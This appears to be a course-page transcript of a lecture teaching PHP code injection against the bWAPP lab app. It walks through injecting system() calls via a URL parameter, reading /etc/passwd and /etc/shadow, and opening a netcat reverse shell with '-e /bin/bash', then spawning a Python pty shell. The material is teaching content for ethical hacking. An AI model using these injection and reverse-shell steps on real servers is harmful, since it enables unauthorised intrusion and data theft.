1. Home
  2. Training Library
  3. A Practical Intro to PHP Injections

PHP Code Injection


PHP Injection
PHP Code Injection
PREVIEW14m 41s

The course is part of this learning path

PHP Code Injection

This course builds upon our bWAPP app to run you through how to carry out PHP Injections as well as look at upload vulnerabilities.


Hi, within this lecture, we're going to start working on PHP Injections. So, PHP is a programming language if you're not familiar with it and this time we're going to run this code on server on the server computer so it may lead to much more dangerous consequences for the website, okay? So, I'm in my bWAPP. So, if you didn't open your bWAPP, just open it and just start it like this, okay? I'm also running Kali Linux as usual. So, if you haven't watched the previous section, I suggest you watch it to see how to install this bWAPP and how to log in. So, we're going to continue with the bWAPP for some time right now. So, we have covered these injections a little bit, but this time we're going to focus on this PHP Code injection. Again, this is one of the most popular vulnerabilities and one of the most dangerous one so it's a good idea to see this now. So, when we open this PHP injection site or page, let me show you something. I'm going to open the Burp Suite one more time so that it will be run on the background even if we don't need it, if we don't need Burp Suite to hack this, okay? It's always a good idea to make Burp Suite running, okay? So, let me come over here and change the preferences of network settings. So, if you have skipped the Burp Suite setup, so I suggest you go back and watch this because we have seen how to configure this proxy, how to make this run and how to actually gather information in the Burp Suite. So, again, I'm going to see everything in the target once we do that, and let's try this actually. Let me just run this and here we go. Now it's intercepting. If we turn this off then it will just not intercept but it will just gather the information and show it to us. Right now just going to turn this off so that I can see the page and if I go to target, here you go. It started to gather information so it's working right now. So, maybe we just want to get information and just display the requests and responses here, or maybe we just want to intercept something and change the request in a way that we want. Anyhow, so this is the PHP Code injection website and when we go there, we actually see, let me just turn the intercept on one more time. When we just click on this message, it does some kind of a GET request, GET request as you can see, right? So, let's see what is the GET request. So, when we do that it actually sends a parameter called message, okay? And the value of that parameter is test so if I come back, I don't see any input but it just sends this message, it just sends this test message as a parameter. So, if I forward this let's see what it does. we see the test over here. So, we can now see the URL here as well. So, this is kind of parameter over here even though we do not define the parameter when we first click on, okay? Let me turn this off and see if this really the way it works. So, for example, if I just changed this message, let's see if this will show the test over there. For example, rather than test, I can just say hello, okay? And it will say hello. even if we didn't see it in the URL, then what we could do, we could do it in the Burp Suite, right? Because we know how to change the parameters, we now have to change the requests and we can just write whatever we want and we can forward it and it would work one more time. So, rather than hello, maybe I want to run some PHP Code over here with the semicolon. So, semicolon means, okay, run this code and then we're going to do something else. Let me show you how it works. For example, we can do this in our terminal like this. If I type something like ls it will show me the list of directories and documents on my current directory in my roots. So, this is pwd and if I run whoami, it will show you I am root, right? So, what if I write, whoami; ls. So, as you can see it actually runs the first and then it goes to the second command and it executes both of them. So, whoami is executed and we have seen root and then ls is executed as well, right? So, if I do the same principle over here, if I execute the same principle, I can just put a semicolon over here and I can run some other PHP code called system. So, by writing system I can just write some kind of command like in Linux Shell. For example, whoami. And here we go, after reflecting hello in here as message, it returns us www-data which is the current user that this actually system runs on. So, by doing that we understood that by injecting the system whoami code, we managed to get the result back. So, it basically means that I get to execute any command that I want. For example, I can just observe the content of the etc passwd file. So, let me show you what I'm talking about. If you go to /etc or etc in your own Kali Linux, okay? Like this, if you type ls you will see there are very critical files and folders for Kali Linux or for Linux generally in the etc folder, okay? So, what I want to do, I want to show you this file, this passwd file. So, this passwd file actually consists of different user information in your system. So, if I cut this, cut passwd, I can see all the different users and all the different services running, some users and they are hashed passwords. Not exactly hashed passwords because this is the hashed passwords are stored in another file right now rather than etc passwd, I'm going to show with you as well. And this extends for the passwd so it used to be there before, but right now at the latest versions of Linux, it's saved in another file called shadow. So, if you say cat shadow, you can see the hashed passwords of your root or any other user as well, okay? So, as you can see these are all critical files. So, if you see the content of them, it won't be good for the website or the server. So, maybe we may want to see the content of this etc passwd and trying to get the content of the etc passwd is very standard, so we're going to use this a lot during our pentest. So, it means that if you get to see the etc passwd then you can pretty much do some severe damage to the server. So, what I'm going to do, I'm going to write "cat /etc/passwd" over here and there is a space between cat and the etc passwd, okay? And here we go, we see the details of the etc passwd and again, this is not my Kali Linux etc passwd, this is the server's etc passwd, okay? I managed to retrieve the information from the server and this is very critical because it may lead to severe implications. If you can get this, you can see pretty much all of the data. For example, if we try to get the shadow file over here, "cat /etc/shadow" it won't let us see it, okay? In order to see the shadow, you have to become root or an admin privileged user and maybe you can see the passwd but not the shadow, it's totally fine. We are www-data user over here, okay? But in Kali Linux we are root so we can see whatever we want. But again, seeing the etc passwd would be a very big opportunity for you to gain bounty as well. So, here we go. Now, let me do something much more malicious. I'm going to run net cat one more time with nvlp, okay? So, I'm going to listen for incoming connections like we have done before but this time the incoming connection will be something like this. So, I'm just going to directly net cat into my own Kali Linux from the server and I'm going to just listen it from here, okay? And I'm going to use the port 1234. So, I'm going to run the net cat over here to just open a connection from here to my Kali Linux. So, I'm going to say "nc" and let's check if I have You can check yourself and see your own IP address. You have to direct this connection to your own IP address which is for me and then with a space, I'm going to write 12345. So, this will open a connection, okay? And we're going to listen that connection and we're going to get that connection and we have to execute this by bin/bash, okay? You have to write like this, -e /bin/bash. And if bin/bash doesn't work you can just write bin/sh as well. So, this is just to execute this, okay? We're just trying to execute this and we're just going back and let's see, here we go. We have the connection but this time we're not only getting the IP address or some kind of information, we actually established a connection between the server and our Kali Linux. So, we actually hacked into the web server, okay? So, what I'm going to do, I'm going to write pwd and here we go. We are inside of the var/www/bWAPP. So, this is not running this code or commands inside of our Kali Linux. If I run ls, we will see the content of the directories and files inside of the web server. We actually hacked into the web server at this point. So, it's very good and as you can see, PHP injection might get very severe. We managed to hack into that server. So, great, what we can do more is to, it's not very actually the subject of this course, but we can try to spawn a shell and try to escalate our privileges or stuff. So, I'm going to show you some command. So, this is a file that I use for my CTF or pentesting. As you can see, there is a code like this, so it spawns a Python shell. It actually runs a Python code and it spawns a shell, so you can either try this or the other one. So, the other one is SH, what am I about to do? I'm going to try the bash. So, as you can see, I can run commands over here, but in some commands, maybe I can get some restrictions, I want to create a shell out of the hacked web server so that I can run whatever I want and I can do, I can just browse around the server in a way that I want. It would be much more stable, okay? So, I will try to spawn a shell. So, what I'm going to do, I'm going to copy one of this and I suggest you do the same. Just pause the video and take a note of this Python code so that you can use it in your pentesting and CTF after this course ends, okay? So, this actually imports some library called PTY and then it helps us to spawn a bin/bash shell. So, if you have taken my complete ethical hacker course, you know how Python works. So, this would be pretty easy for you but if you haven't, don't worry, just take a note of this Python code and just hit 'Enter' and here we go. Now we are actually inside of the machine, the web server over here so we can run whatever we want. Let's run whoami, we are www-data. And again of course, hacking into or just deleting some stuff or uploading some stuff or downloading some stuff is not what we are looking for in the real web application bug bounties because it won't be very ethical or it can actually lead to some severe damage inside of the server. If you can get in, that's enough. I believe maybe you can try to browse around a little bit but not download something or upload something or just don't even delete something from the server then it would be illegal, okay? So, I believe there is some sort of an error because we hacked into server or stuff, I'm going to close this thing down, okay? I'm going to just close this thing down as well and just start everything from scratch. Don't forget about this as well, the bin/bash thing or net cat thing, because it will come handy when you do some other challenges during the course as well. So, let's stop here and continue within the next one.

About the Author
Learning Paths

Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.